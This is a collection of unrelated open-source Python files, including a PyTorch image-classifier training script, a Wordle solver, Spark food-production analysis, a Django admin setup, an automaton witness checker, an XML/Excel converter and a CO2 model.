\"\"\"\"\n args:\n \n str2bool(args.freeze): [boolean] freeze pre-trained or not\n \"\"\"\n model2train = VIT_patch16(device, str2bool(args.freeze))\n\n elif args.model_name == \"VIT_patch32\":\n \"\"\"\"\n args:\n str2bool(args.freeze): [boolean] freeze pre-trained or not\n \"\"\"\n model2train = VIT_patch32(device, 
str2bool(args.freeze))\n elif args.model_name == \"ResNet_50\":\n \"\"\"\"\n args:\n str2bool(args.freeze): [boolean] freeze pre-trained or not\n \"\"\"\n model2train = ResNet_50(device, str2bool(args.freeze))\n elif args.model_name == \"ResNet_34\":\n \"\"\"\"\n args:\n str2bool(args.freeze): [boolean] freeze pre-trained or not\n \"\"\"\n model2train = ResNet_34(device, str2bool(args.freeze))\n\n elif args.model_name == \"ResVit\":\n \"\"\"\"\n args:\n\n str2bool(args.freeze): [boolean] freeze pre-trained or not\n \"\"\"\n model2train = ResVit(device, args=args)\n\n else:\n print(\"Sorry, there isn't a model related to this model, please make sure you choose the correct model name\")\n\n\n\n # Load weights if needed\n if args.load_path:\n model2train.load_model(args.load_path) # args.load_path [str][default:None] path to load the weights\n\n # Define loss and optimizer\n if args.loss_name == \"Cross_Entropy\":\n loss = HybridLoss(device, args, temperature=1, alpha=1) \n elif args.loss_name == \"Hybrid_loss\":\n loss = HybridLoss(device, args, temperature=0.3, alpha=0.5)\n print(\"temperature\", 0.3)\n else:\n raise AssertionError(\"No such loss, it has to be either Cross_Entropy or Hybrid_loss\")\n \n optimizer = torch.optim.AdamW(model2train.parameters(), lr=0.00001) # weight_decay=1e-4\n scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer,\n lambda x: ((1 + math.cos(x * math.pi / args.epochs)) / 2) * (1 - 0.2) + 0.2)\n best_correct = 0\n\n # Whether to train the whole network\n if str2bool(args.training):\n for t in range(args.epochs):\n print(f\"Epoch {t + 1}\\n-------------------------------\\n\")\n log1.info(f\"Epoch {t + 1}\\n-------------------------------\\n\")\n train(device, t, log1, writer, train_loader, model2train, loss, optimizer)\n test_correct, test_loss = test(device, t, log1, writer, test_loader, model2train, loss, scheduler)\n valid_correct, valid_loss = evaluate(device, t, log1, writer, valid_loader, model2train, loss, scheduler)\n log2.info(str(t) + '___' + str(valid_loss) + '___' + str(valid_correct) + str(test_loss) + str(test_correct) + '\\n')\n if best_correct < test_correct:\n best_correct = test_correct\n model2train.save_model(args.save_dir) # updated args.save_dir at the beginning of the main()\n # torch.save(model2train.state_dict(), \"./model/weight/VIT_patch16_epoch.pth\")\n log1.info(\"Saved PyTorch Model State epoch is \" + str(t) + \" valid_correct = \" + str(valid_correct) + \" test_correct = \" + str(test_correct) + \"\\n\")\n print(\"Saved PyTorch Model State epoch is \" + str(t) + \" valid_correct = \" + str(valid_correct) + \" test_correct = \" + str(test_correct) + \"\\n\")\n print(\"The best accuracy is :\", best_correct)\n else:\n \"\"\"\n Please remember to load a path of weights if you do not want to train\n\n The weights are in the `weights` folder\n \"\"\"\n # Check if there is a path of weights given for loading into the model\n assert args.load_path, \"\\n Please load the weights if you don't wanna train the whole model. 
\" \\\n \"\\n Please check more details in args.py\"\n correct, test_loss = test(device, 0, log1, writer, test_loader, model2train, loss, scheduler)\n model2train.save_model(args.save_dir) # updated args.save_dir at the beginning of the main()\n # torch.save(model2train.state_dict(), \"./model/weight/VIT_patch16_epoch.pth\")\n log1.info(\"Load trained model without training with epoch \" + \"t=0\" + \" correct = \" + str(correct) + \"\\n\")\n print(\"Load trained model without training with epoch \" + \"t=0\" + \" correct = \" + str(correct) + \"\\n\")\n\n log1.info(\"Done!\\n\")\n print(\"Done!\\n\")\n\nif __name__ == '__main__':\n\n main()\n","repo_name":"GengyaoLiu/UCL_Dissertation_Source_Code","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":20551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19621780629","text":"def fun1(targets, dictionary):\n target_frequency = {}\n present = {}\n list_length = 0\n for word in targets:\n list_length += 1\n for letter in set(word):\n if letter not in target_frequency:\n target_frequency[letter] = {}\n if letter not in present:\n present[letter] = 0\n present[letter] += 1\n pattern = [letter == other_letter for other_letter in word]\n key = get_key2(pattern)\n if key in target_frequency:\n target_frequency[letter][key] += 1\n else:\n target_frequency[letter][key] = 1\n for letter in target_frequency:\n assert list_length > present[letter]\n target_frequency[letter][0] = list_length - present[letter]\n best_guess = None\n max_score = 0\n for word in dictionary:\n word_length = len(word)\n score = 1\n for letter in set(word):\n compared_frequency = {}\n for pattern in target_frequency[letter]:\n assert len(pattern) == word_length\n guess_pattern = [\n letter == other_letter for other_letter in word]\n target_pattern = list(pattern)\n compared_pattern = [\"unknown\"] * word_length\n for index in range(word_length):\n if guess_pattern[index] and target_pattern[index]:\n compared_pattern[index] = \"exact\"\n guess_pattern[index] = False\n target_pattern[index] = False\n continue\n for guess_index in range(word_length):\n if not guess_pattern[guess_index] or guess_pattern[guess_index] not in target_pattern:\n continue\n for target_index in range(word_length):\n if guess_pattern[guess_index] and target_pattern[target_index]:\n compared_pattern[guess_index] = \"elsewhere\"\n guess_pattern[guess_index] = False\n target_pattern[target_index] = False\n for index in range(word_length):\n if guess[index] and guess[index] not in target:\n compared_pattern[index] = \"absent\"\n key = get_key4(compared_pattern)\n if key in compared_frequency:\n compared_frequency[key] += 1\n else:\n compared_frequency[key] = 1\n score += cross_product(compared_frequency.values())\n if score > max_score:\n best_guess = word\n max_score = score\n return best_guess\n\n\ndef fun2(targets, dictionary):\n best_guess = None\n max_score = 0\n for word in dictionary:\n word_length = len(word)\n score = 1\n for target in targets:\n assert len(target) == word_length\n guess = list(word)\n goal = list(target)\n compared_pattern = [\"unknown\"] * word_length\n for index in range(word_length):\n if guess[index] == goal[index]:\n compared_pattern[index] = \"exact\"\n guess[index] = None\n goal[index] = 
None\n","repo_name":"dinay-kingkiller/pseudocode","sub_path":"toy/testing/wordle_v3.py","file_name":"wordle_v3.py","file_ext":"py","file_size_in_byte":3308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28973119175","text":"from operator import add\nfrom pyspark.sql import SparkSession\nimport matplotlib.pyplot as plt\nimport plotly.graph_objects as go\n\nclass FAO_production():\n \n def __init__(self, data, spark):\n self.df = data\n self.sparksession = spark\n \n def list_countries(self):\n '''\n Returns all countries list.\n :return: list\n '''\n test = []\n return self.df.rdd.map(lambda line: line[0]).distinct().collect()\n \n def countries_productions(self):\n return self.df.rdd.map(lambda line: (line[0], [line[5]])).reduceByKey(lambda accum, n: accum + n).collect()\n \n def production_sum(self):\n dicc = {}\n for year in range(1961,2014):\n dicc['Y'+ str(year)] = 'sum'\n\n prod_years = self.df.agg(dicc).schema.names\n prod_sum = self.df.agg(dicc).rdd.map(lambda line: line[0:54]).collect()[0]\n \n Sum = []\n for i,elt in enumerate(prod_years):\n Sum.append([elt[5:9],prod_sum[i]])\n\n Sum_ordered = sorted(Sum, key=lambda tup: tup[0])\n\n return self.sparksession.createDataFrame(Sum_ordered)\n \n def plot_production_sum(self, dataFrame):\n x = [int(row['_1']) for row in dataFrame.select('_1').collect()]\n y = [int(row['_2']) for row in dataFrame.select('_2').collect()]\n\n plt.plot(x,y)\n plt.show()\n \n def get_geo_zone(self, dataSource):\n df_geo = self.sparksession \\\n .read \\\n .format('csv') \\\n .options(header='true', inferSchema='true', delimiter=';') \\\n .load(dataSource)\n\n return self.df.join(df_geo, self.df.Area == df_geo.Country)\n \n def get_prod_by_zones(self, geo_zones_df, year_ini, year_end, zones):\n dicc = {}\n prod_by_zones = {}\n\n for year in range(year_ini, year_end):\n dicc['Y'+ str(year)] = 'sum'\n prod_by_zones[str(year)] = []\n\n for zone in zones:\n prod_years = geo_zones_df.filter(geo_zones_df.Zone == zone).agg(dicc).schema.names\n prod_sum = geo_zones_df.filter(geo_zones_df.Zone == zone).agg(dicc).rdd.map(lambda line: line[0:54]).collect()[0]\n\n Sum = []\n for i, elt in enumerate(prod_years):\n Sum.append([elt[5:9], prod_sum[i]])\n\n Sum_ordered = sorted(Sum, key=lambda tup: tup[0])\n\n for year in Sum_ordered:\n prod_by_zones[year[0]] = prod_by_zones[year[0]] + [(zone, year[1])]\n \n return prod_by_zones\n\n \n \n def plot_production_zones(self, prod_zones_map, year_ini, year_end, color_zones):\n AP=[]\n E=[]\n AS=[]\n A=[]\n SA=[]\n U=[]\n NA=[]\n\n years = [str(x) for x in range(year_ini, year_end)]\n\n for year in years:\n AP.append(prod_zones_map[year][0][1])\n E.append(prod_zones_map[year][1][1])\n AS.append(prod_zones_map[year][2][1])\n A.append(prod_zones_map[year][3][1])\n SA.append(prod_zones_map[year][4][1])\n U.append(prod_zones_map[year][5][1])\n NA.append(prod_zones_map[year][6][1])\n\n fig = go.Figure()\n\n for i, zone in enumerate(list(color_zones.keys())):\n fig.add_trace(go.Bar(\n y=years,\n x=AP,\n name=zone,\n orientation='h',\n marker=dict(\n color=color_zones[zone],\n line=dict(color='black', width=0.25)\n )\n ))\n\n fig.update_layout(barmode='stack')\n fig.show()\n\n def group_prod_world(self, year, country_list):\n year_selected ={'Y' + str(year) :'sum'}\n return self.df.filter(self.df.Area.isin(country_list)).groupBy('Area').agg(year_selected)\n \n def production_world_refact(self, prod_world_grouped, year, country_list):\n panda_df = 
prod_world_grouped.toPandas()\n\n col = 'sum(Y' + str(year) + ')'\n # year_selected ={'Y' + str(year) :'sum'}\n\n prod = {}\n for country in country_list:\n prod[country] = panda_df.loc[panda_df['Area'] == country, [col][0]]\n \n \n \n # prod[country].agg(year_selected).rdd.map(lambda line: line[0]).collect()[0]\n \n # self.df.filter(self.df.Area == country).agg(year_selected).rdd.map(lambda line: line[0]).collect()[0]\n # for elt in list(prod.items()):\n # if prod[elt[0]]== None:\n # prod[elt[0]]=0\n return prod\n\n def production_world(self, year, country_list):\n year_selected ={'Y' + str(year) :'sum'}\n \n prod = {}\n for country in country_list:\n prod[country] = self.df.filter(self.df.Area == country).agg(year_selected).rdd.map(lambda line: line[0]).collect()[0]\n \n for elt in list(prod.items()):\n if prod[elt[0]]== None:\n prod[elt[0]]=0\n \n return prod\n \n \n def countries_coor(self):\n coor = self.df.select(*( self.df.columns[i] for i in [0,61,62] )).distinct().rdd.map(lambda line: (line[0], line[1], line[2])).collect()\n return self.sparksession.createDataFrame(coor)\n \n \n def plot_production_world(self, dataframe):\n coor = self.countries_coor()\n \n lati = [int(row['_2']) for row in coor.select('_2').collect()]\n long = [int(row['_3']) for row in coor.select('_3').collect()]\n name = [row['_1'] for row in coor.select('_1').collect()]\n\n N = {}\n for i,elt in enumerate(name):\n N[elt] = (lati[i],long[i])\n\n N1 = list(N.items())\n N2 = sorted(N1, key=lambda tup: tup[0]) \n\n produc = list(dataframe.values())\n\n latitude = []\n longitude = []\n names = []\n for elt in N2:\n latitude.append(elt[1][0])\n longitude.append(elt[1][1])\n names.append(elt[0])\n \n fig = go.Figure(data=go.Scattergeo(\n lon = longitude,\n lat = latitude,\n text = names,\n mode = 'markers',\n marker = dict(\n size = 8,\n opacity = 0.8,\n reversescale = False,\n autocolorscale = False,\n symbol = 'square',\n line = dict(\n width=1,\n color='rgba(102, 102, 102)'\n ),\n colorscale = 'Blues',\n cmin = 0,\n color = produc,\n cmax =100000,\n colorbar_title=\"Food production (1000 tonnes)\"\n )))\n\n fig.update_layout(\n title = 'Countries 2013',\n geo = dict(\n scope='world',\n #projection_type='albers usa',\n showland = True,\n landcolor = \"rgb(250, 250, 250)\",\n subunitcolor = \"rgb(217, 217, 217)\",\n countrycolor = \"rgb(217, 217, 217)\",\n countrywidth = 0.5,\n subunitwidth = 0.5\n ),\n )\n\n fig.show()","repo_name":"devonfw-forge/spark-data-and-ci-showcase","sub_path":"FAO/FAO_production.py","file_name":"FAO_production.py","file_ext":"py","file_size_in_byte":7325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27665031185","text":"from django.contrib import admin\nfrom app.models import Estudante, Materia, Mentor, Solicitacao\n\nadmin.site.site_title = \"Admin Ensinas\"\nadmin.site.site_header = \"Administração Ensinas\"\nadmin.site.index_title = \"Administração do Sistema\"\n\n@admin.register(Materia)\nclass MateriaAdmin(admin.ModelAdmin):\n list_display = ('nome',)\n ordering = ('nome',)\n search_fields = ('nome',)\n\n@admin.register(Estudante)\nclass EstudanteAdmin(admin.ModelAdmin):\n list_display = ('nome', 'email')\n ordering = ('nome',)\n search_fields = ('nome', 'email')\n\n@admin.register(Mentor)\nclass MentorAdmin(admin.ModelAdmin):\n list_display = ('nome', 'email', 'aprovado', 'instituicao', 'curso')\n ordering = ('nome', 'email')\n search_fields = ('nome', 'email', 'instituicao', 
'curso')\n\n@admin.register(Solicitacao)\nclass SolicitacaoAdmin(admin.ModelAdmin):\n list_display = ('estudante', 'mentor', 'oculto')\n ordering = ('estudante', 'mentor')\n search_fields = ('estudante', 'mentor')","repo_name":"JuliaWharton/Ensinas-backend","sub_path":"app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"39723738979","text":"# -*- encoding: utf-8 -*-\n\"\"\"\nThis module provide functionality for checking the correctness of\nwitnesses from the forbidden pattern algorithm.\n\"\"\"\n\n__author__ = \"Alexander Weigl \"\n__date__ = \"2012-06-12\"\n\nfrom dfa import valid_witness\n\nclass WitnessChecker(object):\n \"\"\"\n Describes an checker for witnesses. Can be constructed by a string specification\n and a list of other WitnessChecker.\n\n A WitnessChecker has to implement the protocol:\n\n >>> MyChecker(object):\n >>> def __call__(self, dea, witness):\n >>> raise Exception(\"...\") # if a constraint was violated\n >>> return True # if every constraint was hit\n\n Also __str__ and __repr__ should be implemented for nice printing.\n \"\"\"\n\n def __init__(self, spec=None, usecheckers=None):\n \"\"\"\n \"\"\"\n if usecheckers:\n self.call_checkers = usecheckers\n else:\n self.call_checkers = []\n\n self.spec = spec\n self.checks = []\n\n if spec:\n self.checks = parseSpecification(spec)\n\n def __iadd__(self, other):\n print(\"__iadd__\")\n if type(other) is (list, tuple):\n self.checks += other\n else:\n self.checks.append(other)\n\n def __str__(self):\n string = \"\"\n\n if self.spec:\n string = \"created from spec: \\n %s \\n#end spec\\n\" % self.spec\n\n if self.call_checkers:\n string += \"rules from other checkers:\\n+\" + \"-\" * 20 + \"\\n|\\t\"\n for witness in self.call_checkers:\n string += str(witness).replace(\"\\n\", \"\\n|\\t\") + \"\\n+\" + \"-\" * 20\n\n string += \"\\n\"\n\n if self.checks:\n string += \"checks:\\n\"\n for checker in self.checks:\n string += \"\\t\" + str(checker) + \"\\n\"\n\n return string\n\n def __repr__(self):\n return \"WitnessChecker(%s,%s)\" %\\\n (repr(self.spec), repr(self.call_checkers))\n\n def __call__(self, dea, witness):\n if not valid_witness(witness):\n return False\n\n for chck in self.call_checkers:\n chck(dea, witness)\n\n for checker in self.checks:\n checker(dea, witness)\n\n #False by Exception\n return True\n\n\ndef generateParser():\n import ply.yacc as yacc\n import ply.lex as lex\n\n literals = (\"-\", \",\", '#')\n tokens = [\"DELIM\", \"NAME\", \"ANTI\", \"ARROW\", \"SMALLER\"]\n t_DELIM = r\"(\\n|;)\"\n t_ANTI = r\"<[#]>\"\n t_ARROW = r\"->\"\n t_ignore = \" \\t\"\n t_SMALLER = r\"<=\"\n\n def t_NAME(t):\n r'[a-zA-Z_0-9\\']+'\n return t\n\n # def t_newline(t):\n # r\"\\n+\"\n # t.lexer.lineno += t.value.count(\"\\n\")\n # t.type = \"DELIM\"\n\n\n def t_error(t):\n print(\"Illegal character '%s'\" % t.value[0])\n print(t)\n t.lexer.skip(1)\n\n\n start = \"cnstrnts\"\n\n def p_cnstrnts_recur(p):\n '''cnstrnts : cnstrnts DELIM def'''\n\n p[1].append(p[3])\n p[0] = p[1]\n\n def p_cnstrnts_anchor(p):\n '''cnstrnts : def'''\n p[0] = list(( p[1], ))\n\n\n def p_def_path(p):\n '''def : NAME '-' NAME ARROW NAME\n | NAME '-' NAME ARROW NAME '-' NAME'''\n if len(p) == 8:\n p[5] = p[5] + \"\\\\\" + p[7]\n p[0] = path(p[1], p[3], p[5])\n\n\n def p_def_antivalence(p):\n '''def : NAME ',' NAME ANTI NAME ',' NAME'''\n p[0] = antivalence(p[1], p[3], p[5], p[7])\n\n def p_def_neq(p):\n '''def : 
NAME '#' NAME'''\n p[0] = neq(p[1], p[3])\n\n def p_def_alpha(p):\n '''def : NAME SMALLER NAME'''\n p[0] = alpha(p[1], p[3])\n\n\n def p_error(t):\n if t:\n print(\"Syntax error at value '%s' on line %d:%d\" % (t, t.lineno, t.lexpos))\n\n def find_column(input, token):\n last_cr = input.rfind('\\n', 0, token.lexpos)\n if last_cr < 0:\n last_cr = 0\n column = (token.lexpos - last_cr) + 1\n return column\n\n lexer = lex.lex()\n yacc.yacc(debug=False, write_tables=False)\n return yacc\n\n_parser = generateParser()\nparseSpecification = lambda spec: _parser.parse(spec.strip())\n\n\nclass composable(object):\n \"\"\"\n Defines the addition operator for building lists:\n >>> a,b,c = composable(),composable(),composable()\n >>> a + b + c\n [ a , b , c]\n \"\"\"\n\n def __add__(self, other):\n if type(other) in (list,):\n other.append(self)\n return other\n else:\n return list((self, other))\n\n\nclass alpha(composable):\n def __init__(self, *args):\n if len(args) == 1:\n self.word1, self.word2 = parseSpecification(args[0])\n else:\n self.word1, self.word2 = args\n\n def _tuple(self):\n return self.word1, self.word2\n\n def __repr__(self):\n return \"alpha('{0} <= {1}')\".format(*self._tuple())\n\n def __str__(self):\n return \"check if \\alpha({0}) \\subseteq \\alpha({1})\".format(*self._tuple())\n\n def __call__(self, dea, witness, msg=\"\"):\n w = witness[self.word1]\n v = witness[self.word2]\n\n if not set(w) <= set(v):\n raise Exception(\"alpha check failed for witness,v = (%s,%s) \" % (witness, v))\n #else:\n # print(str(self), \"is satisfied\")\n return True\n\n\nclass path(composable):\n def __init__(self, *args):\n if len(args) == 1:\n self.start, self.words, self.target = parseSpecification(args[0])\n else:\n self.start, self.words, self.target = args\n\n self.start, self.words, self.target = map(str, self._tuple())\n\n def _tuple(self):\n return self.start, self.words, self.target\n\n def __repr__(self):\n return \"path('{0} - {1} -> {2}')\".format(*self._tuple())\n\n def __str__(self):\n return \"check if \\hat \\delta({0}, {1}) = {2}\".format(*self._tuple())\n\n def __call__(self, dea, witness, msg=\"\"):\n #word = []\n #for witness in iterwords(self.words):\n # word += witness[witness]\n try:\n word = witness[self.words]\n\n start_state = witness[self.start]\n end_state = dea(start_state, word)\n\n if self.target == \"F\":\n ret = end_state in dea.F\n elif self.target in (\"Q-F\", \"Q\\\\F\"):\n ret = end_state in (dea.Q - dea.F)\n else:\n target_state = witness[self.target]\n ret = end_state == target_state\n\n if not msg:\n msg = \"%s - %s -> %s\" % (self.start, self.words, self.target)\n\n if not ret:\n raise Exception(\"path check failed: \" + msg)\n #else:\n # print(str(self), \"is satisfied\")\n return True\n\n except KeyError as e:\n print(self._tuple(), witness, e)\n raise Exception(\"witness %s not found\" % e)\n\n\nclass antivalence(composable):\n def __init__(self, *args):\n if len(args) == 1:\n self.state1, self.word1, self.state2, self.word2 = parseSpecification(args[0])\n else:\n self.state1, self.word1, self.state2, self.word2 = args\n\n def _tuple(self):\n return self.state1, self.word1, self.state2, self.word2\n\n def __repr__(self):\n return \"path('{0},{1} <#> {2},{3}')\".format(*self._tuple())\n\n def __str__(self):\n return \"check if \\delta({0}, {1}) \\in F <#> \\delta({2},{3}) \\\\in F\".format(*self._tuple())\n\n def __call__(self, dea, witnesses, msg=\"\"):\n # word = []\n # for witness in iterwords(word1):\n # word += self.witness[witness]\n\n try:\n start1 
= witnesses[self.state1]\n start2 = witnesses[self.state2]\n word1 = witnesses[self.word1]\n word2 = witnesses[self.word2]\n\n end1 = dea(start1, word1)\n end2 = dea(start2, word2)\n\n if not ((end1 in dea.F) ^ (end2 in dea.F )):\n raise Exception(\"failed: \" + str(self))\n except KeyError as e:\n print(self._tuple(), witnesses, e)\n raise Exception(\"witness %s not found\" % e)\n\n\nclass neq(composable):\n def __init__(self, *args):\n if len(args) == 1:\n self.state1, self.state2 = parseSpecification(args[0])\n else:\n self.state1, self.state2 = args\n\n def _tuple(self):\n return self.state1, self.state2\n\n def __repr__(self):\n return \"path('{0} # {1}')\".format(*self._tuple())\n\n def __str__(self):\n return \"check if {0} \\\\neq {0}\".format(*self._tuple())\n\n def __call__(self, dea, witness):\n check = witness[self.state1] != witness[self.state2]\n if not check:\n raise Exception(\"neq failed: %s = %s\" % (self.state1, self.state2))\n\n\ncheckWitnessL12 = WitnessChecker(\n \"\"\"\n p - w -> q\n p - z -> F\n q - z -> Q - F\n p # q\n \"\"\"\n)\n\ncheckWitnessB12 = WitnessChecker(\n \"\"\"\n p - v -> p\n q - v -> q\n \"\"\",\n (checkWitnessL12,))\n\ncheckWitnessL1_1 = WitnessChecker(\n \"\"\"\n p - w -> q\n q - v -> p\n p,z <#> q,z\n \"\"\")\n\ncheckWitnessL1_2 = WitnessChecker(\"\"\"\n q - u -> p\n p - v -> r\n r - u -> p\n q - v -> s\n s - u -> t\n t - v -> s\n t,z <#> p,z\n p # t\n \"\"\")\n\n#===============================================================================\n# {'q': 2, 'p': 1, 's': 3, 'r': 0, 'u': 'a', 't': 3, 'f': 3, 'v': 'bb', 'z': 'abb', 'd': 0}\n# 2 - a -> 1\n# 1 - bb -> 0\n# 0 - a -> 1\n# 2 - bb -> 3\n# 3 - a -> 3\n# 3 - bb -> 3\n# 3,abb 1,abb\n# 1 != 3\n#===============================================================================\n\ncheckWitnessB1 = WitnessChecker(\"\"\"\n q1 - y -> q2\n q2 - y' -> q1\n q1 - w -> q1\n q2 - w' -> q2\n q1 - u -> q3\n q3 - v -> q5\n q5 - u -> q3\n q3 - w -> q3\n q5 - w' -> q5\n q2 - v -> q4\n q4 - u -> q6\n q6 - v -> q4\n q4 - w -> q4\n q6 - w' -> q6\n q3,z <#> q6,z \n\"\"\")\n\ncheckWitnessL32 = WitnessChecker(\"\"\"\n p - v -> p\n q - v -> q\n p - w -> q\n p,z <#> q,z \n w <= v\n\"\"\")\n\ndef t(dea, witness):\n try:\n return checkWitnessL1_1(dea, witness[0]) and checkWitnessL1_2(dea, witness[1]),\n except Exception as e:\n raise e\n\nCHECKERS = {\n 'l12': checkWitnessL12,\n 'b12': checkWitnessB12,\n 'l1': t, #lambda dea, witness: checkWitnessL1_1(dea,witness[0]) and checkWitnessL1_2(dea,witness[1]),\n 'b1': checkWitnessB1,\n 'l32': checkWitnessL32, }\n\nif __name__ == \"__main__\":\n print(\"Witness Checkers:\")\n print(repr(checkWitnessL12))\n print(checkWitnessB12)\n print(checkWitnessL1_1)\n print(checkWitnessL1_2)\n print(checkWitnessB1)\n print(checkWitnessL32)\n \n ","repo_name":"wadoon/FPinTD","sub_path":"src/witnesscheck.py","file_name":"witnesscheck.py","file_ext":"py","file_size_in_byte":10647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"39227428674","text":"from typing_extensions import final\nimport xml.etree.ElementTree as ET\nimport io\nimport pandas as pd\nimport os\n\nfrom xml.dom.minidom import parseString\n\n\n\nsheetname=[]\ndataframe_list=[]\nside_tag_list=['band-front','band-back','band-left','band-right','band-top','band-bottom']\nrule_set_col_name = ['part-name', 'construction-type',\n 'band-front','band-back','band-left','band-right','band-top','band-bottom',\n 'raw-front','raw-back','raw-left','raw-right','raw-top','raw-bottom' 
]\n\nedge_dict = {\n 'band-front':False,\n 'band-back':False,\n 'band-left':False,\n 'band-right':False,\n 'band-top':False,\n 'band-bottom':False,\n}\n\nraw_dict = {\n 'raw-front':0,\n 'raw-back':0,\n 'raw-left':0,\n 'raw-right':0,\n 'raw-top':0,\n 'raw-bottom':0,\n}\n\n\ndef forward_convert(fullpathxlsx, saveloc, filename):\n file_path = fullpathxlsx\n f = io.open(file_path, encoding=\"utf8\")\n tree = ET.parse(f)\n root = tree.getroot()\n for rule_set in root:\n sheetname.append(rule_set.attrib['name']+' protected='+rule_set.attrib['protected'])\n \n rule_set_df = pd.DataFrame(columns=rule_set_col_name)\n\n\n for rule in rule_set:\n part_name = rule.attrib['part-name']\n construction_type = rule.attrib['construction-type']\n header_dict = {'part-name':part_name, 'construction-type':construction_type}\n\n edge_dict = {\n 'band-front':False,\n 'band-back':False,\n 'band-left':False,\n 'band-right':False,\n 'band-top':False,\n 'band-bottom':False,\n }\n\n raw_dict = {\n 'raw-front':0,\n 'raw-back':0,\n 'raw-left':0,\n 'raw-right':0,\n 'raw-top':0,\n 'raw-bottom':0,\n }\n\n for side in rule:\n side_name = side.tag.split(\"}\")[1]\n side_raw = side.attrib['raw']\n side_edge = side.text\n\n edge_dict[side_name] = side_edge\n raw_dict['raw-' + side_name.split(\"-\")[1]]\n\n final_dict = {**header_dict, **edge_dict, **raw_dict}\n rule_set_df = rule_set_df.append(final_dict, ignore_index=True)\n \n dataframe_list.append(rule_set_df)\n\n\n writter=pd.ExcelWriter(saveloc+\"\\\\\"+filename[0:-4] +\"_Converted.xlsx\",engine=\"openpyxl\")\n i=0\n for df in dataframe_list:\n df.to_excel(writter,sheet_name=sheetname[i],index=False,engine=\"openpyxl\")\n i+=1\n writter.save()\n \n\ndef backward_reverse(fullpathxlsx, saveloc, filename):\n df_dict = pd.read_excel(fullpathxlsx,sheet_name=None,dtype=str)\n \n\n xml_text='''\n\\n'''\n\n\n root = ET.Element(\"banding-automatic\", xmlns=\"http://xmlns.pytha.com/banding-automatic/1.0\")\n \n\n\n for df_key in df_dict.keys():\n [name,protected] = df_key.split(' protected=')\n rule_set = ET.SubElement(root, \"rule-set\", name=name, protected=protected)\n for _,rule_row in df_dict[df_key].fillna(value=\"\").iterrows():\n rule = ET.SubElement(rule_set, \"rule\",attrib = {'construction-type':rule_row['construction-type'], 'part-name':rule_row['part-name']} )\n for side_name in ['band-front','band-back','band-left','band-right','band-top','band-bottom']:\n if rule_row[side_name] != 'False' : ET.SubElement(rule, side_name, raw=rule_row['raw-'+side_name.split('-')[1]]).text = rule_row[side_name]\n \n pass\n xml_text = xml_text + parseString(ET.tostring(root,short_empty_elements=False).decode(\"utf-8\")).childNodes[0].toprettyxml(indent=\" \")\n file1 = open(saveloc+\"\\\\\"+filename.replace(\"_Converted\",\"\")[:-5]+\".txt\", 'w')\n file1.write(xml_text)\n file1.close()\n\n\n pass\n\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n Method=\"0\"\n while Method != \"C\" and Method != \"R\" and Method != \"c\" and Method != \"r\" :\n Method=input(\"Convert/Revert(C/R/):\")\n if Method != \"C\" and Method != \"R\" and Method != \"c\" and Method != \"r\":\n print(\"Input C or R\")\n print(\"You input \"+Method)\n\n fullpathxlsx=input(\"File:\")\n if \"\\\"\" in fullpathxlsx:\n fullpathxlsx=fullpathxlsx[1:-1]\n saveloc, filename= os.path.split(fullpathxlsx)\n\n if Method == \"C\" or Method == \"c\":\n forward_convert(fullpathxlsx, saveloc, filename)\n elif Method == \"R\" or Method == \"r\":\n backward_reverse(fullpathxlsx, saveloc, filename)\n 
pass","repo_name":"podcharatee/Pytha_pattern_format","sub_path":"pytha_banding_auto.py","file_name":"pytha_banding_auto.py","file_ext":"py","file_size_in_byte":5811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22542278739","text":"\"\"\"Packages Module.\n\nAllows user to address different dependency types (package, module,\npath, pypi, etc.) through a single uniform api.\n\n\"\"\"\n\nfrom pathlib import Path\nfrom typing import Any, Optional, Union\n\nimport requirements\n\nfrom .package import Package\nfrom .source_package import PackageDependencySource, VCSDependencySource\nfrom .source_path import LocalDependencySource\n\n\ndef create_dependency_source(\n requirement: str, name: Optional[str] = None, **kwargs: Any\n) -> Union[LocalDependencySource, PackageDependencySource, VCSDependencySource]:\n \"\"\"Factory for creating a dependency source object.\n\n Args:\n requirement (str): Package name/path/constraints in string form.\n name (str, optional): Override package name.\n Defaults to None.\n\n Returns:\n Appropriate Dependency Source\n\n \"\"\"\n req = next(requirements.parse(str(requirement)))\n if req.local_file:\n path = Path(req.path)\n name = name or path.name\n pkg = Package(name, req.specs, path=req.path)\n source = LocalDependencySource(pkg, path)\n return source\n pkg = Package(**req.__dict__)\n if pkg.vcs is not None or pkg.revision is not None:\n return VCSDependencySource(pkg, **kwargs)\n return PackageDependencySource(pkg, **kwargs)\n\n\n__all__ = [\n \"Package\",\n \"PackageDependencySource\",\n \"LocalDependencySource\",\n \"create_dependency_source\",\n]\n","repo_name":"BradenM/micropy-cli","sub_path":"micropy/packages/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":289,"dataset":"github-code","pt":"3"} +{"seq_id":"37056259825","text":"from Predictions import *\r\nimport scipy.stats as stat\r\n\r\n#\r\n# Models reagent sequestration via convolution\r\n# Q0 - balance concentaration\r\n# q(t) - reagent addition (removal)\r\n# q_norm - total system volume to compute concentarations\r\n# sigma - 1/characteristic reaction time\r\n# uncertainty - sustematic error in q estimate\r\n#\r\nclass CO2_Sequestration_Analytical:\r\n def __init__( self, model_start=1800, model_end=2200):\r\n self.Interpolation = Interpolation_Realistic_2018()\r\n self.Interpolation.Solve( np.arange(model_start, 2018, 1))\r\n self.Interpolation.Correct_To_Actual(1800, 2018)\r\n self.Q_Initial = 284.0 # pre-industrial CO2 concentration, ppm\r\n self.M_atmosphere = 5.1480e9 # mln tonn\r\n self.conversion = 0.658e6 # conversion from mass ppm to ppmv\r\n self.Sigma = 